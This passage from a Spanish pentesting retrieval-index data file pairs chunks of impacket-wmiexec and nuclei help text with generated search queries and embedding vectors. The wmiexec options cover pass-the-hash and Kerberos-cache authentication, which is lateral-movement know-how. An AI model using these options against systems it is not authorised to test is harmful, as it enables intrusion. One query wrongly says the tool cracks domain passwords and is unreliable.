again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "cuΓ‘l herramienta me ayuda a configurar la codificaciΓ³n del texto al conectar con otros sistemas", "v": [0.01494, 0.15936, -0.14483, -0.18525, 0.10682, -0.17217, -0.06306, 0.01899, -0.10867, -0.05181, -0.2762, -0.08723, -0.02301, -0.06453, 0.09054, -0.02208, 0.10194, -0.12562, 0.00298, 0.00159, 0.00765, -0.0925, -0.07747, -0.0224, -0.05509, 0.01546, 0.08481, -0.10974, -0.16912, -0.01283, -0.00571, -0.05852, 0.03934, 0.01899, -0.1421, -0.00088, 0.00217, 0.13301, -0.03254, 0.05784, -0.08024, 0.01157, 0.03861, 0.09466, 0.06006, -0.06382, 0.00094, -0.01242, 0.04819, 0.00706, -0.07247, -0.09276, -0.15418, -0.09448, -0.07774, -0.12831, 0.2203, -0.14353, 0.00575, -0.11575, -0.0321, 0.05059, -0.06285, -0.01594, 0.09105, 0.0455, -0.02727, -0.07261, -0.07924, 0.04563, 0.03712, 0.01948, -0.05174, -0.01788, 0.06617, 0.10123, 0.02187, 0.00134, 0.13071, 0.01091, 0.08095, -0.0021, -0.08255, 0.01037, 0.00674, -0.04448, 0.00708, -0.01032, 0.01241, -0.10727, 0.03712, -0.09662, 0.00531, -0.0416, 0.04017, -0.00922, -0.00204, -0.04466, -0.03813, 0.052, 0.11576, -0.08473, -0.08102, 0.08191, -0.02779, -0.05507, -0.0178, -0.0678, -0.00982, -0.05856, 0.03196, 8e-05, 0.00444, -0.04804, 0.00299, -0.03035, 0.02937, -0.02626, -0.01334, -0.09532, -0.0286, 0.05561, -0.01792, -0.00471, 0.03119, 0.08212, 0.02982, 0.10387, 0.06347, 0.02507, -0.01397, -0.05254, -0.02751, -0.0514, -0.05293, -0.01222, -0.00999, -0.07645, -0.07157, -0.04376, -0.02845, 0.04581, -0.01618, -0.07166, 0.04994, 0.03097, 0.04467, -0.07302, -0.01677, 0.00333, -0.04092, 0.00612, -0.03688, -0.00793, -0.01859, -0.00439, 0.04683, 0.05833, -0.06023, -0.01311, -0.08309, -0.05772, 0.0211, -0.02316, 0.00691, -0.03021, -0.05014, -0.0103, 0.12526, 0.05014, 0.01729, 0.01318, 0.0553, -0.00199, 0.01303, -0.05578, -0.02234, 0.00942, -0.00243, -0.02648, -0.07786, 0.02134, 0.01629, -0.05263, 0.01357, 0.0072, -0.00416, -0.03206, -0.00874, 0.04269, -0.01074, 0.04917, -0.03439, -0.0434, 0.04122, -0.03903, -0.03233, -0.09541, 0.02331, 0.0198, -0.08077, -0.0167, 0.02808, -0.07248, 0.05935, 0.10782, -0.04752, 0.01922, 0.00269, 0.06951, 0.05235, -0.00199, 0.05057, -0.00231, -0.02899, 0.01075, -0.01262, 0.02399, 0.00823, -0.00492, 0.04618, 0.02077, 0.05099, 0.01521, 0.00424, -0.00457, 0.02303, 0.02416, -0.03718, 0.01229, -0.03168, -0.07949, 0.00596, 0.00449, 0.01066, -0.02656, 0.00093, -0.03366, -0.05963, -0.03622, 0.04511, 0.0839, 0.01645, -0.04634, -0.04499, -0.02983, -0.08355, -0.00812, -0.03306, -0.06738, -0.03102, 0.02991, 0.0693, -0.08592, 0.02831, -0.03201]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "indexar": "que herramienta sirve para romper contraseΓ±as de dominio con Kerberos?", "v": [0.04334, -0.10002, -0.14065, -0.18436, -0.06694, -0.17413, 0.03351, 0.0504, -0.05307, -0.09389, -0.06402, -0.01254, 0.06435, -0.25568, 0.10285, -0.0056, 0.08977, -0.03207, 0.03207, 0.10631, 0.01601, 0.02428, -0.02114, -0.02155, -0.00463, -0.1059, -0.00155, -0.08877, -0.11825, 0.084, -0.04473, -0.06321, 0.05482, -0.01418, -0.08295, -0.02858, -0.06274, 0.13074, 0.04378, 0.12349, 0.14716, 0.05758, -0.10923, 0.1444, -0.10286, 0.0477, -0.0619, -0.02527, 0.10763, 0.01129, -0.01072, -0.12934, -0.12182, -0.03314, -0.01233, -0.12663, 0.17681, -0.06344, -0.02718, -0.03956, -0.16667, -0.04807, -0.06275, 0.04635, -0.06342, -0.18469, -0.02364, -0.03243, -0.05397, 0.08678, -0.00581, 0.02824, 0.04598, 0.03339, 0.05909, 0.01702, 0.0674, -0.00693, 0.05122, 0.04039, 0.00886, 0.02076, -0.04814, 0.01047, -0.10278, -0.10594, 0.04273, -0.05375, 0.08448, -0.05434, 0.01813, 0.09301, -0.04929, -0.03345, -0.01629, -0.08459, 0.00427, -0.05331, -0.09069, -0.02889, 0.09567, 0.05835, -0.07408, 0.03589, 0.01627, 0.0174, -0.04808, 0.00638, 0.00943, -0.0601, 0.08368, 0.02389, -0.02088, -0.03694, -0.05911, 0.09571, -0.08979, -0.06008, 0.01731, 0.00437, -0.01192, 0.00345, -0.03259, -0.00104, -0.02773, 0.04578, 0.02185, 0.01475, -0.07971, -0.15414, 0.02812, -0.04762, -0.04353, 0.02983, -0.02295, 0.07837, 0.03101, -0.12093, -0.09655, -0.04516, -0.01182, 0.02896, -0.07662, -0.01963, 0.03649, 0.04064, 0.10223, -0.02957, 0.00438, 0.00145, -0.03775, -0.03414, -0.03445, 0.05065, -0.05251, 0.06028, -0.10393, -0.02615, -0.06172, 0.08461, -0.04271, -0.04409, -0.00842, 0.03504, -0.01275, -0.04356, 0.07946, 0.05331, 0.07802, 0.1139, 0.03196, 0.07221, 0.06911, 0.01222, -0.0319, -0.02442, 0.01498, -0.03083, -0.06667, -0.08363, 0.0002, -0.07601, -0.01556, 0.02816, 0.00292, -0.00178, 0.06729, -0.01792, -0.03009, 0.00586, 0.04051, 0.00448, -0.06005, 0.00639, 0.03199, 0.00229, 0.0044, -0.03423, 0.0266, -0.02455, -0.04524, -0.00188, -0.00281, -0.03024, 0.00966, 0.05876, -0.02704, -0.07748, -0.01761, -0.00124, -0.00134, -0.01821, 0.00254, -0.05596, -0.04451, -0.04103, -0.0308, 0.0288, -0.05307, -0.01586, -0.0091, 0.0311, 0.03145, -0.0096, 0.03032, 0.02776, 0.00021, -0.03099, 0.03222, -0.00115, 0.00282, -0.00418, -0.0164, 0.03954, 0.05357, -0.05263, -0.015, -0.02245, -0.03138, -0.02581, -0.07677, 0.02935, 0.03984, -0.03201, -0.05464, -0.04455, -0.01842, -0.01428, -0.02074, -0.00214, -0.0458, 0.00069, -0.00834, 0.01143, -0.02658, -0.02877]} -{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "indexar": "con que puedo hacer autenticaciΓ³n sin pedir contraseΓ±a en una mΓ‘quina remota?", "v": [0.08714, 0.06955, -0.19882, -0.09963, 0.03278, -0.00957, -0.02673, -0.00215, -0.11655, -0.03886, 0.00278, 0.01224, 0.14762, -0.01999, 0.07178, 0.02038, 0.09088, 0.13637, 0.1112, 0.05333, 0.10547, -0.12192, 0.05337, -0.03078, -0.00977, -0.02009, 0.1408, 0.05176, -0.12527, -0.09314, 0.0445, 0.01198, 0.07544, 0.02125, 0.02706, 0.10878, 0.02436, 0.11493, 0.08795, 0.04589, 0.09271, 0.09222, -0.12171, 0.06782, 0.07572, 0.03809, 0.12283, 0.02501, 0.0557, 0.04739, -0.1566, -0.14967, -0.0504, -0.0593, -0.0677, -0.0899, 0.24527, -0.0378, 0.07313, -0.03858, -0.05944, -0.01715, 0.00289, 0.09743, -0.07384, -0.0397, 0.04502, -0.02377, -0.0151, 0.03305, -0.05883, -0.08337, -0.0747, -0.00632, 0.03277, -0.02418, -0.03403, -0.05319, 0.06703, 0.07773, -0.07529, 0.00828, 0.02219, -0.09615, -0.0397, -0.04393, 0.03527, -0.02013, 0.11857, -0.13759, 0.07248, 0.03597, -0.00581, -0.00543, 0.10597, -0.0217, 0.0078, -0.02549, -0.08645, -0.03953, 0.02044, -0.01165, -0.01801, 0.11765, -0.04304, 0.01595, 0.05412, -0.02131, 0.00921, -0.04924, 0.01912, -0.03807, -0.09403, -0.01544, -0.05842, -0.0442, -0.09565, -0.08551, 0.00219, 0.06084, -0.04826, -0.08782, 0.03821, -0.03957, 0.06298, 0.02573, -0.01965, 0.1009, -0.00961, -0.07425, 0.04709, 0.00765, -0.04191, -0.01847, 0.00196, 0.02518, -0.02604, -0.1695, -0.07068, -0.05006, 0.00093, 0.04916, 0.003, -0.06098, 0.06226, 0.02876, 0.02509, -0.10435, -0.11228, 0.00431, 0.01097, 0.01508, 0.02177, 0.09685, -0.04982, 0.05, -0.03571, -0.08381, -0.0135, 0.08828, -0.0391, -0.02207, -0.06395, 0.00403, -0.1187, -0.01595, -0.01993, 0.00859, 0.01307, -0.00878, -0.06977, 0.041, 0.02708, 0.00019, 0.01867, 0.03329, 0.05095, -0.07028, -0.00906, -0.0807, -0.05395, -0.01229, -0.01141, -0.09508, 0.03042, 0.00387, 0.0548, -0.02543, 0.00536, 0.00939, 0.06873, -0.00073, -0.03848, 0.09717, 0.03981, -0.00469, -0.03909, 0.02649, 0.0577, -0.0333, -0.05143, -0.03899, -0.03362, -0.05362, 0.07095, 0.0206, -0.06401, -0.0157, -0.04427, 0.00171, 0.02736, -0.01072, 0.00553, -0.09536, -0.05607, -0.02427, -0.0026, -0.00555, -0.08626, 0.00919, 0.03958, 0.01374, 0.05307, 0.0777, 0.03192, 0.02878, 0.04119, 0.0469, 0.01752, -0.02228, -0.02375, 0.04244, -0.03621, 0.00047, 0.08612, 0.01704, -0.01994, -0.08603, -0.03744, -0.01569, -0.01809, 0.05195, 0.00997, -0.08376, -0.04543, 0.00459, -0.0662, 0.01822, -0.0061, -0.03141, -0.08083, -0.01383, 0.03473, 0.01027, 0.01991, 0.0252]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# nuclei β€” manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "indexar": "que herramienta sirve para escanear vulnerabilidades en URLs", "v": [0.04504, -0.09153, -0.20394, -0.17375, 0.03696, -0.13624, -0.14588, -0.15745, 0.09091, 0.01225, -0.07323, -0.13815, -0.01251, -0.10187, -0.00516, 0.0617, 0.01191, -0.15057, 0.05449, 0.07744, -0.02396, 0.03325, -0.0738, -0.01094, -0.19306, 0.02817, -0.03458, -0.03231, -0.12046, 0.01506, -0.02811, 0.09301, 0.02945, -0.01486, -0.1192, 0.0267, -0.02468, 0.02105, 0.05646, 0.06711, 0.05115, 0.02132, -0.11872, -0.0289, 0.02093, -0.01888, -0.07973, 0.00736, 0.02471, 0.14372, -0.06855, -0.13109, -0.18604, 0.00493, -0.03322, -0.07569, 0.15866, -0.1222, 0.02044, -0.05083, -0.1601, 0.02404, 0.01976, -0.03853, -0.03029, -0.02025, -0.03235, -0.01148, -0.14245, 0.0731, -0.04176, 0.03829, 0.04852, -0.04032, -0.05764, -0.07219, -0.01485, 0.06688, -0.03022, 0.02811, 0.07517, 0.01844, -0.06192, 0.07355, -0.12235, -0.01804, 0.11677, -0.00407, 0.09934, -0.06399, 0.02133, 0.08807, -0.03602, 0.0066, -0.0004, -0.04633, 0.08599, -0.03888, -0.0036, -0.05239, 0.03572, -0.10055, -0.06064, 0.06414, 0.03261, 0.06883, -0.04914, 0.01244, -0.04491, 0.00801, 0.04251, 0.05016, -0.04697, -0.00673, -0.05303, 0.11543, -0.01299, -0.02917, 0.03124, -0.07361, 0.04055, -0.08045, -0.09298, -0.01595, -0.03892, 0.05322, 0.00544, 0.00396, 0.0021, -0.09045, -0.0062, -0.08172, -0.04661, 0.08075, -0.00104, -0.01484, 0.0793, -0.16748, -0.05685, -0.00725, 0.01707, 0.01787, -0.03739, -0.03512, -0.02508, 0.05329, 0.05085, -0.00689, -0.02814, 0.00054, 0.04588, -0.04306, -0.07076, -0.00332, -0.07346, -0.00312, -0.06031, 0.03877, -0.09569, 0.05738, -0.029, 0.00125, 0.05132, 0.04559, 0.00345, -0.04087, 0.0723, 0.03802, 0.06281, 0.06306, 0.05057, 0.08869, 0.06795, -0.05588, 0.01527, -0.05809, -0.01741, 0.00923, -0.0035, -0.05592, -0.01003, -0.07143, -0.00063, -0.00051, 0.06391, -0.03306, 0.04149, -0.03517, 0.00682, 0.04001, -0.02754, -0.04973, 0.0091, -0.03862, 0.06523, 0.03547, -0.01131, -0.05182, -0.01492, -0.0273, -0.05634, -0.01333, -0.03692, -0.03407, 0.07003, 0.0845, 0.02985, -0.11119, -0.01363, 0.05521, 0.00822, 0.00666, 0.04552, -0.02586, -0.00161, -0.05616, 0.01392, 0.08039, -0.0376, -0.03938, -0.0235, -0.04393, 0.02129, 0.02389, 0.00454, 0.01973, -0.03502, -0.06136, -0.02475, -0.03557, 0.04523, -0.0729, -0.05938, -0.01375, 0.01202, -0.09345, 0.01538, 0.00749, -0.00511, -0.00053, -0.02842, -0.00986, -0.00137, -0.02996, -0.01183, -0.06617, 0.0233, -0.04991, -0.02255, -0.05382, -0.0436, -0.01284, 0.01936, -0.06511, 0.00494, -0.0453]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# nuclei β€” manual\n\nSalida de `nuclei --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n nuclei [flags]\n\nFlags:\nTARGET:\n -u, -target string[] target URLs/hosts to scan\n -l, -list string path to file containing a list of target URLs/hosts to scan (one per line)\n -eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)\n -resume string resume scan using resume.cfg (clustering will be disabled)\n -sa, -scan-all-ips scan all the IP's associated with dns record\n -iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)", "indexar": "cual es una alternativa libre a los scanners de seguridad tradicionales", "v": [0.16254, 0.01588, -0.09182, -0.05812, -0.13259, -0.05638, -0.073, -0.14038, -0.027, 0.02081, -0.06943, -0.09279, -0.01532, -0.02538, 0.05696, 0.01707, 0.0316, -0.04713, 0.14177, 0.02465, -0.03933, -0.04063, -0.09218, -0.0923, 0.01261, -0.09964, -0.03952, 0.03289, -0.12171, 0.05787, 0.05072, 0.07672, 0.12686, 0.01552, -0.12418, -0.00982, 0.12234, 0.08037, 0.02998, -0.03623, 0.04648, -0.12658, -0.04655, -0.02593, 0.04436, -0.04963, -0.06892, 0.0761, 0.02887, 0.022, -0.10856, -0.03671, -0.01101, -0.0186, 0.04143, -0.08584, 0.07472, 0.04311, -0.03183, -0.03857, -0.09875, 0.09583, 0.07663, -0.03378, 0.04215, -0.0253, -0.03785, -0.0082, -0.10568, -0.02057, 0.07421, 0.02125, -0.00373, 0.08805, -0.14247, -0.04555, -0.08708, 0.02494, 0.02769, 0.07243, 0.02426, -0.04735, 0.03206, 0.02287, -0.08551, -0.10674, -0.03902, -0.08927, -0.05714, 0.05481, 0.05316, 0.05732, 0.06981, 0.09022, 0.03927, -0.0534, 0.04367, 0.09291, -0.0597, 0.11884, 0.08637, -0.04294, -0.08054, 0.04265, 0.07632, -0.09275, -0.04048, 0.04491, -0.00233, -0.03187, -0.04367, 0.06125, -0.04254, 0.049, -0.07337, 0.00133, -0.03057, -0.04114, 0.03277, 0.02617, -0.02335, -0.01417, -0.00402, -0.04933, 0.07398, 0.00623, 0.00747, 0.09937, -0.07483, -0.00222, 0.08504, -0.06733, -0.11877, -0.05966, -0.14301, 0.00937, 0.04332, -0.16149, 0.02888, -0.00182, 0.04356, 0.03302, 0.02093, -0.04613, 0.07079, 0.01913, 0.0359, -0.00977, -0.04462, -0.02174, -0.11782, 0.04894, -0.04983, 0.11222, -0.01619, 0.05242, -0.10351, -0.05228, -0.05655, 0.15357, 0.0537, -0.01157, 0.07452, -0.0254, -0.07048, 0.01348, 0.01591, -0.10483, -0.01817, -0.03217, 0.00683, 0.03869, 0.04664, -0.05827, 0.03405, -0.03667, -0.0203, -0.09912, 0.08618, -0.09327, -0.00958, 0.07264, -0.07672, 0.00692, 0.12058, -0.08638, 0.00321, 0.03605, 0.05587, 0.02974, -0.01159, 0.00306, -0.11764, -0.03617, -0.06671, 0.0007, 0.00125, -0.07077, -0.02882, -0.02566, -0.07109, 0.01834, -0.00028, -0.087, 0.02354, 0.04555, -0.02296, 0.02493, 0.00222, 0.04649, 0.02949, 0.01184, 0.06985, -0.03032, -0.08697, -0.02382, 0.03072, -0.03224, -0.03574, -0.01909, 0.05786, -0.00663, 0.00556, 0.02027, -0.02783, -0.004, 0.04779, 0.07979, 0.0212, -0.01638, 0.03712, 0.01647, -0.10702, 0.01412, 0.04653, 0.038, -0.02598, -0.00252, -0.03221, -0.07377, 0.03177, 0.06854, -0.05297, -0.05897, -0.07477, 0.00521, -0.13385, 0.00802, -0.00758, -0.0576, -0.04028, 0.07702, 0.05393, 0.0115, 0.01126, -0.06065]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TARGET-FORMAT:\n -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default \"list\")\n -ro, -required-only use only required fields in input format when generating requests\n -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file", "indexar": "que programa genera peticiones con campos requeridos en formatos como JSONL o YAML?", "v": [0.09579, 0.04164, 0.0956, -0.1253, -0.02477, -0.13027, 0.06168, 0.04035, -0.10631, -0.15081, -0.0487, 0.09477, 0.08776, -0.13376, 0.11045, 0.00311, 0.10837, -0.08222, -0.03358, 0.04575, -0.12163, -0.04526, -0.02472, -0.17146, -0.08158, 0.12402, 0.08806, -0.11752, 0.01583, 0.06181, 0.0107, -0.06089, -0.02029, -0.0293, -0.02951, 0.01202, -0.03151, 0.16003, -0.14837, 0.11626, -0.00163, -0.01967, -0.01565, 0.00624, -0.00664, 0.05765, -0.02117, 0.02043, -0.08033, -0.10686, 0.04253, 0.04279, -0.11391, 0.01855, 0.06554, -0.10226, 0.08176, -0.21706, -0.05865, 0.02544, -0.02544, -0.07163, 0.03837, -0.12324, 0.06698, -0.01372, 0.08914, 0.02112, 0.04025, -0.02565, -0.02809, -0.11615, 0.03405, -0.12758, 0.08156, -0.03347, 0.01849, -0.10726, 0.03222, -0.00653, -0.02229, 0.0198, -0.01593, 0.06665, -0.0817, 0.0241, -0.01185, -0.01472, -0.09173, -0.05292, 0.0614, 0.04184, 0.09902, 0.09641, 0.06421, -0.10768, 0.07206, 0.0675, 0.00623, 0.11922, -0.13019, 0.01229, 0.0011, -0.00119, -0.04752, 0.02153, 0.07219, -0.12893, 0.02744, 0.10751, 0.03924, 0.02824, 0.0544, 0.06678, -0.0037, -0.04285, -0.07469, -0.05879, -0.00412, -0.05373, -0.0227, 0.03562, -0.08948, 0.0416, 0.083, -0.03787, -0.06769, -0.02624, -0.04853, 0.08567, -0.00335, -0.00541, -0.08469, -0.05834, -2e-05, -0.01619, 0.01442, 0.08084, 0.00704, -0.02465, -0.05918, 0.12899, 0.09138, -0.04952, 0.04768, -0.05142, 0.01144, -0.01955, -0.01549, 0.00235, 0.03292, -0.02649, 0.0253, 0.01161, -0.07192, -0.02331, 0.05035, -0.02945, -0.06619, 0.08978, -0.0581, 0.02643, 0.02024, -0.07973, 0.02746, -0.05332, -0.00584, -0.01001, 0.06159, 0.09507, -0.03516, -0.0278, -0.03434, -0.08008, -0.0334, 0.02054, 0.02183, -0.03822, 0.07957, 0.03064, -0.12279, 0.00709, -0.032, 0.0283, -0.01451, -0.06362, -0.00718, -0.01877, 0.08518, -0.01977, 0.02701, 0.09448, -0.03015, -0.01924, 0.01091, 0.07248, -0.06055, 0.06877, 0.05251, -0.03167, -0.04068, -0.04238, 0.00561, -0.06477, -0.01523, 0.06412, -0.00563, 0.02583, 0.00161, 0.04249, 0.00487, -0.02978, 0.01003, 0.0328, -0.00103, -0.05468, -0.01548, 0.04429, 0.03899, 0.01785, -0.02185, 0.00896, -0.0184, -0.00666, 0.02804, -0.04134, -0.01049, 0.02322, 0.00696, 0.02462, 0.02387, 0.04197, -0.12884, -0.03166, 0.01172, 0.0166, -0.01596, -0.01518, -0.00064, -0.01335, 0.01291, 0.02499, -0.01085, -0.02915, -0.02959, 0.01988, -0.12004, 0.03382, 0.06093, -0.00164, -0.04251, 0.09866, 0.01402, -0.02654, 0.02023, -0.0293]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TARGET-FORMAT:\n -im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default \"list\")\n -ro, -required-only use only required fields in input format when generating requests\n -sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file", "indexar": "cual es una herramienta que ignore la validacion de formato al leer archivos de entrada?", "v": [-0.08489, 0.03423, -0.10997, -0.13983, 0.01491, -0.18033, -0.08005, 0.00405, -0.03354, -0.06127, -0.10473, -0.2068, 0.04616, -0.03246, 0.06348, 0.08563, 0.14402, -0.10969, 0.00812, -0.03312, -0.04864, 0.05879, -0.09588, -0.02145, -0.14391, -0.00482, 0.00956, 0.06223, -0.13356, 0.0253, -0.07976, -0.03116, 0.07022, -0.02946, -0.05809, 0.04305, 0.06637, 0.12501, -0.14733, 0.16334, -0.01514, 0.07537, -0.05937, 0.09262, 0.00757, -0.13121, 0.01296, 0.13891, 0.00818, 0.06354, -0.00926, -0.099, -0.03989, 0.06596, -0.01572, -0.0797, 0.16738, -0.16337, -0.01882, -0.03221, -0.15015, 0.10436, -0.05692, -0.07742, -0.04234, -0.01092, 0.03277, -0.00093, -0.13748, 0.11954, 0.02936, -0.00603, 0.06504, -0.02156, -0.07669, -0.02157, 0.0052, 0.03582, -0.02652, 0.0377, 0.11737, -0.07038, -0.07396, -0.00732, -0.00639, -0.07851, 0.04331, -0.02181, -0.03025, -0.04025, -0.03276, 0.05091, -0.00527, -0.05413, -0.01493, -0.11851, 0.07564, -0.08209, -0.07349, -0.05251, 0.07431, -0.00179, -0.09992, 0.08873, 0.04892, 0.04519, -0.07361, 0.02067, 0.00947, -0.01049, 0.1139, 0.09504, -0.01592, 0.0735, -0.04038, 0.03936, 0.03631, -0.06882, 0.00534, -0.07411, 0.01667, 0.10248, -0.11005, -0.03073, 0.06687, 0.03017, 0.02359, 0.00319, -0.00626, -0.03678, 0.03165, 0.01594, -0.08395, 0.03177, -0.04289, -0.11104, 0.04124, -0.02643, -0.06255, -0.0645, 0.12367, 0.02485, -0.01562, -0.04644, 0.07209, -0.05264, 0.01782, -0.05156, -0.09274, -0.08302, -0.05346, -0.01362, 0.08427, 0.03451, -0.04871, 0.00992, 0.00423, -0.06731, -0.03078, 0.04787, -0.0519, 0.02145, 0.01181, 0.01608, -0.03033, -0.10434, 0.04316, 0.00556, 0.0411, -0.04849, 0.08754, 0.00873, 0.01769, -0.04937, -0.01166, -0.00687, -0.11298, -0.02332, 0.04841, -0.05946, -0.01608, -0.0057, -0.04336, 0.02244, 0.01236, -0.01541, 0.05058, -0.05198, -0.0054, 0.01725, 0.0216, 0.03062, -0.05105, -0.05204, -0.00353, 0.00795, -0.02725, -0.00431, 0.03433, 0.02933, -0.01131, -0.05567, -0.03954, -0.02128, 0.01051, 0.01816, -0.03409, 0.00338, -0.02642, 0.03967, 0.01095, -0.00598, 0.01891, -0.0308, -0.01159, -0.00752, -0.0098, 0.06521, 0.03342, 0.0021, 0.01974, 0.03096, 0.10011, -0.01063, -0.06812, 0.02546, -0.02222, -0.01536, -0.02818, -0.02717, -0.0174, -0.0111, -0.01673, 0.03077, 0.01373, -0.0168, 0.04382, -0.0191, -0.08151, -0.02571, 0.04099, 0.05323, 0.00617, 0.02068, -0.05987, -0.02629, -0.04855, -0.00743, -0.03009, -0.0963, 0.00752, 0.05771, 0.01698, -0.04082, 0.06238, -0.06778]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "TEMPLATES:\n -nt, -new-templates run only new templates added in latest nuclei-templates release\n -ntv, -new-templates-version string[] run new templates added in specific version\n -as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping\n -t, -templates string[] list of template or template directory to run (comma-separated, file)\n -turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)\n -ai, -prompt string generate and run template using ai prompt\n -w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)\n -wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)\n -validate validate the passed templates to nuclei\n -nss, -no-strict-syntax disable strict syntax check on templates\n -td, -template-display displays the templates content\n -tl list all available templates\n -tgl list all available tags\n -sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n -code enable loading code protocol-based templates\n -dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature\n -esc, -enable-self-contained enable loading self-contained templates\n -egm, -enable-global-matchers enable loading global matchers templates\n -file enable loading file templates", "indexar": "quΓ© herramienta sirve para escanear sitios web con plantillas personalizadas?", "v": [0.10122, 0.01338, -0.20032, -0.16353, 0.09447, -0.18072, 0.01937, -0.20192, 0.02183, -0.02932, 0.02501, 0.07076, 0.04279, -0.10541, 0.0428, 0.04951, 0.07016, -0.14985, 0.11145, 0.04677, -0.09557, -0.02935, -0.17463, -0.03288, -0.15969, -0.07075, 0.10813, -0.00303, -0.22661, 0.09924, 0.02096, 0.10372, -0.02303, -0.01144, -0.07378, -0.05991, -0.02215, -0.00946, -0.08802, -0.05626, -0.00363, 0.00147, -0.0744, 0.02163, -0.02508, 0.05828, -0.06319, 0.0457, 0.01013, 0.062, -0.07612, -0.07834, -0.10919, -0.01849, 0.02137, -0.0806, 0.24144, -0.10547, 0.0553, -0.03152, -0.15095, 0.03405, 0.00322, 0.02393, 0.025, 0.00243, -0.02918, 0.00482, -0.03201, -0.04593, -0.05221, 0.00373, 0.10324, -0.08113, 0.08655, -0.01947, 0.02677, 0.09446, 0.023, 0.07076, 0.06641, -0.05736, -0.10634, -0.01089, -0.08254, 0.06109, -0.00545, -0.00742, 0.02855, -0.11381, 0.09527, 0.07645, -0.08995, 0.00359, -0.09348, -0.0935, 0.13602, -0.0339, 0.01573, -0.03525, 0.06198, -0.0368, -0.07439, 0.02228, 0.01068, 0.06055, -0.00151, -0.06641, -0.04384, 0.00163, 0.08422, 0.01032, -0.02781, -0.00031, -0.03228, 0.05048, 0.04097, -0.02024, 0.01916, -0.04299, -0.00997, 0.01718, -0.06132, -0.05789, -0.01599, 0.02781, 0.01315, 0.06305, -0.05802, -0.06907, -0.06495, -0.09017, -0.09626, 0.04078, -0.05251, 0.00508, 0.04471, -0.06279, 0.04757, -0.04967, 0.02407, -0.01561, -0.03857, 0.00833, 0.00069, 0.00609, 0.04289, -0.02831, -0.06959, -0.01284, 0.0227, 0.00443, 0.01822, 0.03587, -0.07924, -0.03737, -0.05281, -0.01208, -0.08784, 0.08752, -0.03583, 0.00024, 0.06263, 0.03359, 0.02656, -0.02668, -0.02819, 0.05744, 0.05756, 0.10639, 0.06775, 0.08838, 0.01281, -0.10782, 0.0426, 0.00598, -0.04949, -0.01322, 0.01865, -0.05238, -0.03312, -0.01038, 0.00229, -0.01408, 0.01267, -0.05966, 0.02815, 